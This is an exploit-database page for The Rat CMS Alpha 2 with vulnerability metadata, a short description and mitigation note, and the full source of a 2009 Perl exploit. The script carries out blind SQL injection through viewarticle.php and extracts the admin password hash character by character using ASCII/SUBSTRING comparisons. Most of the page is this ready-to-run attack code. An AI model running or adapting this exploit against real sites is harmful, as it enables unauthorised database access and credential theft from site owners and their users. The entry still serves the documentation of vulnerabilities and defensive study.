header-logo
Suggest Exploit
vendor:
The Rat CMS Alpha 2
by:
darkjoker
7.5
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name: The Rat CMS Alpha 2
Affected Version From: Alpha 2
Affected Version To: Alpha 2
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Perl
2009

The Rat CMS Alpha 2 Blind SQL Injection Exploit

The Rat CMS Alpha 2 is vulnerable to Blind SQL Injection. This exploit is written in Perl and can be used to extract the admin password from the database. It uses the ASCII() function to extract the password character by character.

Mitigation:

The best way to mitigate this vulnerability is to upgrade to the latest version of The Rat CMS Alpha 2.
Source

Exploit-DB raw data:

#--+++=============================================================+++--#
#--+++====== The Rat CMS Alpha 2 Blind SQL Injection Exploit ======+++--#
#--+++=============================================================+++--#
#!/usr/bin/perl

use strict;
use warnings;
use IO::Socket;


sub query {
	my $chr = shift;
	my $pos = shift;
	my $query = "'x' OR ASCII(SUBSTRING((SELECT user_password FROM tbl_auth_user WHERE user_id = 'theadmin'),${pos},1))=${chr}";
	$query =~ s/ /%20/g;
	$query =~ s/'/%27/g;
	return $query;
}

sub check {
	my $host = shift;
	my $path = shift;
	my $chr  = ord (shift);
	my $pos  = shift;

	my $sock = new IO::Socket::INET (
		PeerHost => $host,
		PeerPort => 80,
		Proto    => "tcp",
	);
	
	my $query = query ($chr, $pos);
	print $sock "GET ${path}/viewarticle.php?id=${query} HTTP1.1\r\n\r\n";
	my $x;
	while (<$sock>)
	{
		$x .= $_;
	}

	$x =~ s/\s/ /g;
	$x =~ /<h1 align="center">(.+?)\/h1>/;
	if (length ($1) > 1)
	{
		return 1;
	}
	else
	{
		return 0;
	}

	close ($sock);
}

sub usage {
	print
		"\n[+] The Rat CMS Alpha 2 Blind SQL Injection Exploit".
		"\n[+] Author:  darkjoker".
		"\n[+] Site:    http://darkjoker.net23.net".
		"\n[+] Usage:   perl $0 <hostname> <path>".
		"\n[+] Greetz:  certaindeath\n";
	exit ();
}


my $host = shift;
my $path = shift or usage;

my @key = split '', 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789*';

my $pos = 1;
my $chr = 0;

while ($pos <= 32)
{
	if (check ($host, $path, $key [$chr], $pos))
	{
		print $key [$chr];
		$chr = -1;
		$pos++;
	}
	$chr++;

}

print "\n";

# milw0rm.com [2009-01-04]

Navigation

Suggest Exploit

Services By CQR